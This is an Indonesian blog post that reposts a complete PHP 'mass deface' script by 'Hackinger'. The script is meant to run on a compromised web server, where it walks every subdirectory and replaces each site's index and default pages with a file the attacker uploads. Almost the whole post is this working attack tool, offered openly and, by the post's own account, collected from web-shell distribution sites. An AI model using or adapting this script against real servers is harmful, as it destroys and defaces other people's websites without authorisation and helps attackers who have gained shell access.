ni ada script mass deface.....
====================================
<!--
Coded by Hackinger
Web: www.hackinger.org
Special thanks: Darkc0de,CyberGhost,excellance,The_BeKiR,EntriKa,****llicali,redLine,Sao,Bolivar,kerem125 etc...
plz send email when u discoverz a buggy
mail: hackingerboy@gmail.com
-->
<html>
<style>
body{margin:0px;font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;background-color:#3a3a3a;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;}
input,
.kbrtm,select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}
button{background-color: #666666; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}
body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}
</style>
<title>Hackinger's mass exploit</title>
<br>
<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#303030 borderColorLight=#666666 border=1><tr><td width="100%">
<b><center><font face=tahoma>Windows And Linux Mass Exploiter<br>Coded by Hackinger ©<br>www.hackinger.org</font><center><b>
</td></tr></table><br>
<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#303030 borderColorLight=#666666 border=1><tr><td width="100%">
<b>
<form ENCTYPE="multipart/form-data" action="<?$_SERVER['PHP_SELF']?>" method=post>
Folder :<input typ=text name=dizin size=60 value="<?=getcwd();?>"><br>
Root Folder :<input typ=text name=root size=60 value=""><br>
Index File :<input type="file" NAME="dosya_gonder" size=62 class=kbrtm><br>
<input type=submit value=mass>
</form>
<html>
</td></tr></table><br>
<?
$dizin_adi=$_POST['dizin'];
$root=$_POST['root'];
$indexz=array('index.html','index.htm','index.asp','index.cfm','index.php','default.html','default.htm','default.asp','default.cfm','default.php');//d0 u need 0ther add it
if(isset($dizin_adi)){
$dizin=opendir($dizin_adi);
$dizin = opendir ($dizin_adi);
while ( gettype ( $bilgi = readdir( $dizin ) ) != boolean ) {
if ( is_dir( "$dizin_adi/$bilgi" ) )
foreach ($indexz as $myindex) {
if($root !=""){
if(is_dir("$dizin_adi\\$bilgi\\$root")){
copy($dosya_gonder,"$dizin_adi\\$bilgi\\$root\\$myindex");
}}
if(!$root){
copy($dosya_gonder,"$dizin_adi\\$bilgi\\$myindex");
}}}
closedir ($dizin);
}
?>
Kamis, 02 Februari 2012
mass deface script in php
================================================================
sumber: dapet dr web yg dah bertebaran shell
Langganan:
Posting Komentar (Atom)
0 komentar:
Posting Komentar